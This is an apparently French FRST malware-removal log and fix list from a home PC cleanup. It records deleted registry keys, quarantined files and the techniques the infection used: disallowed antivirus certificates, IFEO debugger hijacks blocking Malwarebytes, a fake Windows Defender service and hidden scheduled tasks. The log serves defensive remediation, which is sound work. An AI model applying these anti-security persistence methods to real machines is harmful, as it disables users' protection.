"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => supprimé(es) avec succès
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => supprimé(es) avec succès
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AutumnWater" => supprimé(es) avec succès
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\7za.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\assistant.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hola.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hola_setup.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hola_svc.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\hola_updater.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\IMF_ActionCenterDownloader.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\malwarebytes_assistant.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbam.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamdor.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbampt.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamresearch.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamscheduler.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamservice.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbamtray.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mweshield.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mweshieldup.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mwesmanager.exe" => supprimé(es) avec succès
"HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mwessweeper.exe" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F} => non trouvé(e)
C:\Windows\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\Windows\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => supprimé(es) avec succès
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => non trouvé(e)
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Classes\CLSID\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}" => supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\otis@digitalpersona.com" => supprimé(es) avec succès
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Mozilla\Firefox\Extensions\\acewebextension_unlisted@acestream.org" => supprimé(es) avec succès
CHR res: infecté resources.pak (Adware script). Réinstallez Chrome. => Erreur: Pas de correction automatique trouvée pour cet élément.
"Chrome HomePage" => supprimé(es) avec succès
"Chrome DefaultSearchURL" => supprimé(es) avec succès
"Chrome DefaultSearchKeyword" => supprimé(es) avec succès
"Chrome DefaultSuggestURL" => supprimé(es) avec succès
CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\patou\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif [2018-06-04] => Erreur: Pas de correction automatique trouvée pour cet élément.
WinDefender => Impossible d'arrêter le service.
"HKLM\System\CurrentControlSet\Services\WinDefender" => supprimé(es) avec succès
WinDefender => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\TCPSvc" => supprimé(es) avec succès
TCPSvc => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\mwescontroller" => supprimé(es) avec succès
mwescontroller => service supprimé(es) avec succès
C:\Windows\rss\csrss.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Local\Temp\s3.exe => déplacé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Services\TCPSvc => non trouvé(e)
C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Maintenance\{72449F31-D047-4C58-925B-334EFCB1471D" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{72449F31-D047-4C58-925B-334EFCB1471D => non trouvé(e)
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
"C:\Windows\rss\csrss.exe" => non trouvé(e)
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\AutumnWater" => non trouvé(e)
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
"C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" => non trouvé(e)
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AutumnWater" => non trouvé(e)
"HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
C:\Windows\Temp\gEA11.tmp.exe => déplacé(es) avec succès
Impossible de déplacer "C:\Windows\windefender.exe" => Planifié pour déplacement au redémarrage.
C:\Users\patou\AppData\Local\Temp\wup\wupv.exe => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
HKLM\SOFTWARE\Classes\CLSID\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
HKCR\CLSID\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
"HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet" => non trouvé(e)
"HKCU\SOFTWARE\Chromium" => supprimé(es) avec succès
"HKCU\SOFTWARE\EpicNet Inc." => supprimé(es) avec succès
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\SOFTWARE\EpicNet Inc. => non trouvé(e)
C:\ProgramData\SupportAssist => déplacé(es) avec succès
C:\ProgramData\SWCUTemp => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\EpicNet Inc => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => non trouvé(e)
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B3C418F8-922B-4faf-915E-59BC14448CF7} => non trouvé(e)
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter" => supprimé(es) avec succès
"HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0}" => supprimé(es) avec succès
"HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0} => non trouvé(e)
"HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0} => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AthBtTray" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AtherosBtStack" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AutumnWater" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CloudNet" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\FLxHCIm64" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\HP Deskjet 3050A J611 series (NET)" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MSC" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Skype" => supprimé(es) avec succès
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => a été déverrouillé
C:\Windows\System32\drivers\WinmonProcessMonitor.sys => déplacé(es) avec succès
C:\ProgramData\Blogger\Blogger.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\Folder\Service.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\cloudnet.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\csrss.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\g5D.tmp.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\gC705.tmp.exe => déplacé(es) avec succès
C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\WinmonProcessMonitor.sys => déplacé(es) avec succès
C:\Windows\Installer\18f77.msi => déplacé(es) avec succès
C:\Windows\Installer\1c581e4.msp => déplacé(es) avec succès
C:\Windows\Installer\316307.msp => déplacé(es) avec succès
C:\Windows\Installer\3fde3c.msp => déplacé(es) avec succès
C:\Windows\Installer\cd260c.msp => déplacé(es) avec succès
C:\Windows\Installer\cf5db.msp => déplacé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Services\TCPSvc => non trouvé(e)
"C:\Users\patou\AppData\Local\Temp\csrss\proxy\tor.exe" => non trouvé(e)
"C:\Windows\rss\csrss.exe" => non trouvé(e)
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
"C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" => non trouvé(e)
"C:\Windows\Temp\gEA11.tmp.exe" => non trouvé(e)
Impossible de déplacer "C:\Windows\windefender.exe" => Planifié pour déplacement au redémarrage.
"C:\Users\patou\AppData\Local\Temp\wup\wupv.exe" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}" => supprimé(es) avec succès
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet" => supprimé(es) avec succès
"C:\Users\patou\AppData\Roaming\EpicNet Inc" => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{EA847F47-97F1-4D78-AB99-C63CA1C327F0} => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Glarysoft MalwareHunter => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\Drive\shellex\ContextMenuHandlers\Glarysoft MalwareHunter => non trouvé(e)
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Shared Tools\MSConfig\startupreg\AutumnWater" => non trouvé(e)
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Shared Tools\MSConfig\startupreg\CloudNet" => non trouvé(e)
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => non trouvé(e)
"C:\Users\patou\AppData\Roaming\ZHP\Quarantine\ZHPCleaner\cloudnet.exe" => non trouvé(e)
"HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules\\{421C7726-58B8-40A1-983B-971B4487B150}" => supprimé(es) avec succès
"HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules\\{A0B09702-C233-4909-9E68-D442F9E01024}" => supprimé(es) avec succès
"HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules\\{9AA2D37C-F863-49A3-A2F2-E99222C76020}" => supprimé(es) avec succès
"HKLM\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\firewallRules\\{7205486D-6178-404B-A2CB-BB4A4963CFF6}" => supprimé(es) avec succès
"C:\Windows\Installer\18f77.msi" => non trouvé(e)
"C:\Windows\Installer\1c581e4.msp" => non trouvé(e)
"C:\Windows\Installer\316307.msp" => non trouvé(e)
"C:\Windows\Installer\3fde3c.msp" => non trouvé(e)
C:\Windows\Installer\c0c16.msp => déplacé(es) avec succès
"C:\Windows\Installer\cd260c.msp" => non trouvé(e)
"C:\Windows\Installer\cf5db.msp" => non trouvé(e)
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => non trouvé(e)
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => non trouvé(e)
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\snxPluginsShell" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{F4B3B0AA-13D1-4a36-BDA2-2055B0F3D5DE} => non trouvé(e)
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F} => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\Glary Utilities => non trouvé(e)
HKLM\Software\Classes\CLSID\{B3C418F8-922B-4faf-915E-59BC14448CF7} => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{72449F31-D047-4C58-925B-334EFCB1471D}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72449F31-D047-4C58-925B-334EFCB1471D}" => supprimé(es) avec succès
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72449F31-D047-4C58-925B-334EFCB1471D} => non trouvé(e)
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{735BB0D7-C364-4093-8CEB-5CADB85B296C}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{735BB0D7-C364-4093-8CEB-5CADB85B296C}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{75D278E1-C0D0-450A-B832-21A5DFEF0CC6}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{75D278E1-C0D0-450A-B832-21A5DFEF0CC6}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\SgeepHD => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SgeepHD" => supprimé(es) avec succès
C:\ProgramData\TEMP => ":05E9FFE5" ADS supprimé(es) avec succès
C:\ProgramData\TEMP => ":5D432CE3" ADS supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9E242FAA-39B1-4AF0-87CA-A8A1D2CB1450}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CFEFC8C3-84C6-4E92-8FE2-CF7D734025ED}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D5919E89-E2DE-4E6A-B7D9-097A43262348}" => supprimé(es) avec succès
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{421C7726-58B8-40A1-983B-971B4487B150}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A0B09702-C233-4909-9E68-D442F9E01024}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0B3B15B8-A375-4D87-BBEB-F65AC94E2C12}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CD247549-C72F-49F2-93E8-EABC28C3E0FD}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9AA2D37C-F863-49A3-A2F2-E99222C76020}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{7205486D-6178-404B-A2CB-BB4A4963CFF6}" => non trouvé(e)
=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 13528258 B
Java, Flash, Steam htmlcache => 1654 B
Windows/system/drivers => 1382380 B
Edge => 0 B
Chrome => 21105141 B
Firefox => 388261943 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 796419 B
systemprofile32 => 3425579 B
LocalService => 66228 B
NetworkService => 66228 B
patou => 163715255 B
TEMP => 47521039 B
RecycleBin => 403040 B
EmptyTemp: => 618.6 MB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 04-06-2018 18:27:24)
C:\Windows\windefender.exe => a été déplacé(e) avec succès
C:\Windows\windefender.exe => a été déplacé(e) avec succès
==== Fin de Fixlog 18:27:24 ====
Exécuté par patou (04-06-2018 18:19:05) Run:1
Exécuté depuis C:\Users\patou\Desktop
Profils chargés: patou (Profils disponibles: patou)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions)
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation)
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot)
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL)
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG)
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation)
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation)
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro)
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.)
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com)
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab)
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ)
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools)
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd)
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.)
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd)
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.)
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd)
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd)
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd)
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee)
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions)
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee)
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software)
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.)
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.)
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security)
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.)
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG)
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd)
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET)
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ)
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software)
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation)
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation)
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro)
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab)
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security)
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software)
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.)
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ)
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL)
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET)
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L)
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\...\Run: [AutumnWater] => C:\Windows\rss\csrss.exe [3188736 2018-06-04] ()
HKU\S-1-5-21-1000389763-2980830304-2624313999-1000\...\Run: [CloudNet] => C:\Users\patou\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-06-04] (EpicNet Inc.)
IFEO\7za.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\assistant.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\hola.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\hola_setup.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\hola_svc.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\hola_updater.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\IMF_ActionCenterDownloader.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\malwarebytes_assistant.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbam.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamdor.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbampt.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamresearch.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamscheduler.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamservice.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mbamtray.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mweshield.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mweshieldup.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mwesmanager.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
IFEO\mwessweeper.exe: [Debugger] C:\Program Files (x86)\IObit\Advanced SystemCare\AutoReactivator.exe
